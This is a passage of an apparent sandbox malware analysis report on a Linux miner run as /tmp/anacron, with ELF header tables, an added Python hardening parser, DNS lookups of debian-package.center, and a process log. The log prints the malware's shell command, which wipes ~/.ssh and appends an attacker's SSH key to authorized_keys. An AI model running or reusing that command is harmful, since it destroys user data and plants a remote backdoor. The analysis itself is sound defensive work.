.gcc_except_table  PROGBITS     0x2b9214    0x2b9214    0x5ed1      0x0       0x2     A                   0      0      4
.tbss              NOBITS       0x2c020c    0x2bf20c    0x8         0x0       0x403   WAT                 0      0      4
.init_array        INIT_ARRAY   0x2c020c    0x2bf20c    0x78        0x4       0x3     WA                  0      0      4
.fini_array        FINI_ARRAY   0x2c0284    0x2bf284    0xc         0x4       0x3     WA                  0      0      4
.ctors             PROGBITS     0x2c0290    0x2bf290    0x8         0x0       0x3     WA                  0      0      4
.dtors             PROGBITS     0x2c0298    0x2bf298    0x8         0x0       0x3     WA                  0      0      4
.data.rel.ro       PROGBITS     0x2c02a0    0x2bf2a0    0x49c8      0x0       0x3     WA                  0      0      32
.dynamic           DYNAMIC      0x2c4c68    0x2c3c68    0xc8        0x8       0x3     WA                  3      0      4
.got               PROGBITS     0x2c4d30    0x2c3d30    0x2c4       0x4       0x3     WA                  0      0      4
.data              PROGBITS     0x2c5000    0x2c4000    0x624       0x0       0x3     WA                  0      0      32
.bss               NOBITS       0x2c5640    0x2c4624    0x9490      0x0       0x3     WA                  0      0      64
.comment           PROGBITS     0x0         0x2c4624    0x1a        0x1       0x30    MS                  0      0      1
.shstrtab          STRTAB       0x0         0x2c463e    0xd2        0x0       0x0                         0      0      1

Program Segments

Type           Offset     Virtual Address   Physical Address   File Size   Memory Size   Flags   Flags Description   Align    Prog Interpreter   Section Mappings
LOAD           0x0        0x0               0x0                0x7570      0x7570        0x4     R                   0x1000                      .gnu.hash .dynsym .dynstr .rel.dyn
LOAD           0x8000     0x8000            0x8000             0x21957d    0x21957d      0x5     R E                 0x1000                      .init .plt .text .fini
LOAD           0x222000   0x222000          0x222000           0x9d0e5     0x9d0e5       0x4     R                   0x1000                      .rodata .eh_frame_hdr .eh_frame .gcc_except_table
LOAD           0x2bf20c   0x2c020c          0x2c020c           0x5418      0xe8c4        0x6     RW                  0x1000                      .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got .data .bss
DYNAMIC        0x2c3c68   0x2c4c68          0x2c4c68           0xc8        0xc8          0x6     RW                  0x4                         .dynamic
TLS            0x2bf20c   0x2c020c          0x2c020c           0x0         0x8           0x4     R                   0x4
GNU_EH_FRAME   0x23e230   0x23e230          0x23e230           0xbf7c      0xbf7c        0x4     R                   0x4                         .eh_frame_hdr
GNU_STACK      0x0        0x0               0x0                0x0         0x0           0x6     RW                  0x10
GNU_RELRO      0x2bf20c   0x2c020c          0x2c020c           0x4df4      0x4df4        0x4     R                   0x1                         .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got

Dynamic Tags

Type              Meta    Value       Tag
DT_SYMBOLIC       value   0x0         0x10
DT_INIT           value   0x8000      0xc
DT_FINI           value   0x221571    0xd
DT_INIT_ARRAY     value   0x2c020c    0x19
DT_INIT_ARRAYSZ   bytes   120         0x1b
DT_FINI_ARRAY     value   0x2c0284    0x1a
DT_FINI_ARRAYSZ   bytes   12          0x1c
DT_GNU_HASH       value   0x154       0x6ffffef5
DT_STRTAB         value   0x17c       0x5
DT_SYMTAB         value   0x16c       0x6
DT_STRSZ          bytes   1           0xa
DT_SYMENT         bytes   16          0xb
DT_DEBUG          value   0x0         0x15
DT_PLTGOT         value   0x2c4d30    0x3
DT_REL            value   0x180       0x11
DT_RELSZ          bytes   29680       0x12
DT_RELENT         bytes   8           0x13
DT_BIND_NOW       value   0x0         0x18
DT_FLAGS_1        value   0x8000001   0x6ffffffb
DT_RELCOUNT       value   3710        0x6ffffffa
DT_NULL           value   0x0         0x0

Symbols

Symbol Name   Version Info Name   Version Info File Name   Section Name   Value   Size   Symbol Type   Symbol Bind   Visibility   Ndx
(empty)                                                    .dynsym        0x0     0      NOTYPE                      DEFAULT      SHN_UNDEF

This single null entry is the whole dynamic symbol table: .dynsym is 0x10 bytes (one entry) and .dynstr a single byte, the program headers contain no PT_INTERP and the dynamic tags no DT_NEEDED. The binary therefore imports nothing from shared libraries; it is a statically linked position-independent executable (DT_FLAGS_1 = 0x8000001 sets DF_1_PIE), which is why the "dynamically linked" label from file(1) above is misleading and no library function names are available for signature matching.
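The header, program segments and dynamic tags above are exactly the structures a loader-level hardening check reads. The Python below is an example added to this report (not Joe Sandbox code): a minimal ELF32 parser that recovers those three structures and derives PIE, non-executable stack, RELRO and BIND_NOW from them. build_sample() constructs a zero-filled skeleton that carries the values listed above (entry 0xbf34, the nine program headers, the 21 dynamic tags with DT_FLAGS_1 = 0x8000001), so the code runs without the binary; parse_elf32() accepts any ELF32 image.

```python
"""Parse an ELF32 header, its program headers and its PT_DYNAMIC tags, and
report loader-level hardening (PIE, NX stack, RELRO, BIND_NOW). Added example
for this report, not Joe Sandbox code. build_sample() constructs a zero-filled
skeleton carrying the header, segment and dynamic-tag values the report lists."""
import struct

ET_DYN = 3                                           # e_type of a shared object / PIE
PT_LOAD, PT_DYNAMIC, PT_TLS = 1, 2, 7
PT_GNU_EH_FRAME, PT_GNU_STACK, PT_GNU_RELRO = 0x6474E550, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS_1 = 0, 24, 0x6FFFFFFB
DF_1_NOW, DF_1_PIE = 0x1, 0x08000000
PHDR_FIELDS = ("type", "offset", "vaddr", "paddr", "filesz", "memsz", "flags", "align")


def parse_elf32(data):
    """Return header fields, program headers and dynamic tags of an ELF32 image."""
    if data[:4] != b"\x7fELF" or data[4] != 1:      # EI_CLASS 1 = ELFCLASS32
        raise ValueError("not an ELF32 image")
    end = "<" if data[5] == 1 else ">"              # EI_DATA 1 = little endian
    (e_type, e_machine, _, e_entry, e_phoff, _, _, _,
     e_phentsize, e_phnum, _, _, _) = struct.unpack_from(end + "HHIIIIIHHHHHH", data, 16)
    phdrs = [dict(zip(PHDR_FIELDS, struct.unpack_from(end + "8I", data, e_phoff + i * e_phentsize)))
             for i in range(e_phnum)]
    dyn = {}
    for ph in phdrs:
        if ph["type"] != PT_DYNAMIC:
            continue
        for pos in range(ph["offset"], ph["offset"] + ph["filesz"], 8):
            tag, val = struct.unpack_from(end + "iI", data, pos)   # Elf32_Dyn: Sword d_tag, Word d_val
            if tag == DT_NULL:
                break
            dyn[tag] = val
    return {"type": e_type, "machine": e_machine, "entry": e_entry, "phdrs": phdrs, "dyn": dyn}


def hardening(elf):
    """Derive checksec-style properties from the parsed headers."""
    stack = [p for p in elf["phdrs"] if p["type"] == PT_GNU_STACK]
    relro = any(p["type"] == PT_GNU_RELRO for p in elf["phdrs"])
    flags1 = elf["dyn"].get(DT_FLAGS_1, 0)
    bind_now = DT_BIND_NOW in elf["dyn"] or bool(flags1 & DF_1_NOW)
    return {
        "pie": elf["type"] == ET_DYN,               # loaded at a random base
        "df_1_pie": bool(flags1 & DF_1_PIE),        # linker confirms it is an executable, not a library
        # Without a PT_GNU_STACK header the x86 kernel grants an executable stack.
        "nx": bool(stack) and not stack[0]["flags"] & PF_X,
        "relro": "full" if relro and bind_now else "partial" if relro else "none",
        "wx_segments": [hex(p["vaddr"]) for p in elf["phdrs"] if p["flags"] & PF_W and p["flags"] & PF_X],
    }


def build_sample(exec_stack=False):
    """Constructed ELF32 skeleton with the header, program headers and dynamic
    tags this report lists for anacron; code and data bytes are zero filled."""
    phdrs = [  # (type, offset, vaddr, paddr, filesz, memsz, flags, align) as in Program Segments
        (PT_LOAD, 0x0, 0x0, 0x0, 0x7570, 0x7570, PF_R, 0x1000),
        (PT_LOAD, 0x8000, 0x8000, 0x8000, 0x21957D, 0x21957D, PF_R | PF_X, 0x1000),
        (PT_LOAD, 0x222000, 0x222000, 0x222000, 0x9D0E5, 0x9D0E5, PF_R, 0x1000),
        (PT_LOAD, 0x2BF20C, 0x2C020C, 0x2C020C, 0x5418, 0xE8C4, PF_R | PF_W, 0x1000),
        (PT_DYNAMIC, 0x2C3C68, 0x2C4C68, 0x2C4C68, 0xC8, 0xC8, PF_R | PF_W, 0x4),
        (PT_TLS, 0x2BF20C, 0x2C020C, 0x2C020C, 0x0, 0x8, PF_R, 0x4),
        (PT_GNU_EH_FRAME, 0x23E230, 0x23E230, 0x23E230, 0xBF7C, 0xBF7C, PF_R, 0x4),
        (PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W | (PF_X if exec_stack else 0), 0x10),
        (PT_GNU_RELRO, 0x2BF20C, 0x2C020C, 0x2C020C, 0x4DF4, 0x4DF4, PF_R, 0x1),
    ]
    dyn = [(16, 0), (12, 0x8000), (13, 0x221571), (25, 0x2C020C), (27, 120), (26, 0x2C0284),
           (28, 12), (0x6FFFFEF5, 0x154), (5, 0x17C), (6, 0x16C), (10, 1), (11, 16), (21, 0),
           (3, 0x2C4D30), (17, 0x180), (18, 29680), (19, 8), (DT_BIND_NOW, 0),
           (DT_FLAGS_1, DF_1_NOW | DF_1_PIE), (0x6FFFFFFA, 3710), (DT_NULL, 0)]
    img = bytearray(0x2C3C68 + 0xC8)                 # image ends right after the dynamic section
    img[:16] = b"\x7fELF\x01\x01\x01" + bytes(9)     # ELFCLASS32, little endian, EV_CURRENT
    struct.pack_into("<HHIIIIIHHHHHH", img, 16,       # e_type .. e_shstrndx as in the ELF header table
                     ET_DYN, 3, 1, 0xBF34, 52, 2901776, 0, 52, 32, 9, 40, 25, 24)
    for i, ph in enumerate(phdrs):
        struct.pack_into("<8I", img, 52 + i * 32, *ph)
    for i, (tag, val) in enumerate(dyn):
        struct.pack_into("<iI", img, 0x2C3C68 + i * 8, tag, val)
    return bytes(img)


if __name__ == "__main__":
    elf = parse_elf32(build_sample())
    print("entry 0x%x, %d program headers, %d dynamic tags" % (elf["entry"], len(elf["phdrs"]), len(elf["dyn"])))
    for name, value in hardening(elf).items():
        print("%-12s %s" % (name, value))
```

Run it on the real file with parse_elf32(open(path, "rb").read()). It handles ELF32 only, which is this sample's class; ELF64 has different header and Elf64_Dyn layouts. On the values above the verdict is PIE, RW (non-executable) stack, full RELRO and no writable-and-executable segment, which matches the GNU_STACK RW, GNU_RELRO and DT_BIND_NOW entries: the miner was built with standard hardening, so nothing about its loader metadata distinguishes it from a legitimately built binary.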

Network Behavior

Network Port Distribution

Total Packets: 12 • 53 (DNS) • 80 (HTTP)

TCP Packets

UDP Packets

DNS Queries

Timestamp                             Source IP      Dest IP   Trans ID   OP Code              Name                    Type             Class
Jan 20, 2020 02:47:30.142142057 CET   192.168.2.20   8.8.8.8   0xc389     Standard query (0)   debian-package.center   A (IP address)   IN (0x0001)
Jan 20, 2020 02:47:30.142239094 CET   192.168.2.20   8.8.4.4   0xc389     Standard query (0)   debian-package.center   A (IP address)   IN (0x0001)
Jan 20, 2020 02:47:30.142302990 CET   192.168.2.20   8.8.8.8   0xd8bc     Standard query (0)   debian-package.center   28 (AAAA)        IN (0x0001)
Jan 20, 2020 02:47:30.142364979 CET   192.168.2.20   8.8.4.4   0xd8bc     Standard query (0)   debian-package.center   28 (AAAA)        IN (0x0001)

DNS Answers

Timestamp                             Source IP   Dest IP        Trans ID   Reply Code     Name                    CName   Address        Type             Class
Jan 20, 2020 02:47:30.167655945 CET   8.8.8.8     192.168.2.20   0xc389     No error (0)   debian-package.center           45.9.148.117   A (IP address)   IN (0x0001)
Jan 20, 2020 02:47:30.167655945 CET   8.8.8.8     192.168.2.20   0xc389     No error (0)   debian-package.center           45.9.148.129   A (IP address)   IN (0x0001)
Jan 20, 2020 02:47:30.167655945 CET   8.8.8.8     192.168.2.20   0xc389     No error (0)   debian-package.center           45.9.148.125   A (IP address)   IN (0x0001)
Jan 20, 2020 02:47:30.167726040 CET   8.8.4.4     192.168.2.20   0xc389     No error (0)   debian-package.center           45.9.148.125   A (IP address)   IN (0x0001)
Jan 20, 2020 02:47:30.167726040 CET   8.8.4.4     192.168.2.20   0xc389     No error (0)   debian-package.center           45.9.148.117   A (IP address)   IN (0x0001)
Jan 20, 2020 02:47:30.167726040 CET   8.8.4.4     192.168.2.20   0xc389     No error (0)   debian-package.center           45.9.148.129   A (IP address)   IN (0x0001)

System Behavior

Analysis Process: anacron PID: 20758 Parent PID: 20706

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: /tmp/anacron File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a

File Activities

File Read

Directory Enumerated

Analysis Process: anacron PID: 20759 Parent PID: 20758

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: n/a File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a

Analysis Process: sh PID: 20759 Parent PID: 20758

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

File Written

Analysis Process: sh PID: 20761 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: rm PID: 20761 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/rm Arguments: rm -rf .ssh File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f

File Activities

File Deleted

File Read

Analysis Process: sh PID: 20764 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: mkdir PID: 20764 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/mkdir Arguments: mkdir .ssh File size: 76848 bytes MD5 hash: a97f666f21c85ec62ea47d022263ef41

File Activities

File Read

Directory Created

Analysis Process: sh PID: 20771 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: chmod PID: 20771 Parent PID: 20759

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/chmod Arguments: chmod -R go= /home/user/.ssh File size: 56112 bytes MD5 hash: 32c8c7318223ebc5b934a78cfc153d6f

File Activities

File Read

Directory Enumerated

Permission Modified

Analysis Process: anacron PID: 20780 Parent PID: 20758

General

Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: n/a File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a

File Activities

File Read

File Written

Analysis Process: upstart PID: 20811 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000

Analysis Process: sh PID: 20811 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 20812 Parent PID: 20811

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 20812 Parent PID: 20811

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e

File Activities

File Read

Analysis Process: sh PID: 20813 Parent PID: 20811

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-checkreports PID: 20813 Parent PID: 20811

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-checkreports Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system File size: 1269 bytes MD5 hash: 1a7d84ebc34df04e55ca3723541f48c9

File Activities

File Read

File Written

Directory Enumerated

Analysis Process: upstart PID: 20838 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000

Analysis Process: sh PID: 20838 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 20839 Parent PID: 20838

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 20839 Parent PID: 20838

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e

File Activities

File Read

Analysis Process: sh PID: 20855 Parent PID: 20838

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-gtk PID: 20855 Parent PID: 20838

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-gtk Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk File size: 23806 bytes MD5 hash: ec58a49a30ef6a29406a204f28cc7d87

File Activities

File Read

File Written

Directory Enumerated

Analysis Process: upstart PID: 20868 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000

Analysis Process: sh PID: 20868 Parent PID: 20139

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 20869 Parent PID: 20868

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 20869 Parent PID: 20868

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e

File Activities

File Read

Analysis Process: sh PID: 20870 Parent PID: 20868

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-gtk PID: 20870 Parent PID: 20868

General

Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-gtk Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk File size: 23806 bytes MD5 hash: ec58a49a30ef6a29406a204f28cc7d87

File Activities

File Read

Directory Enumerated
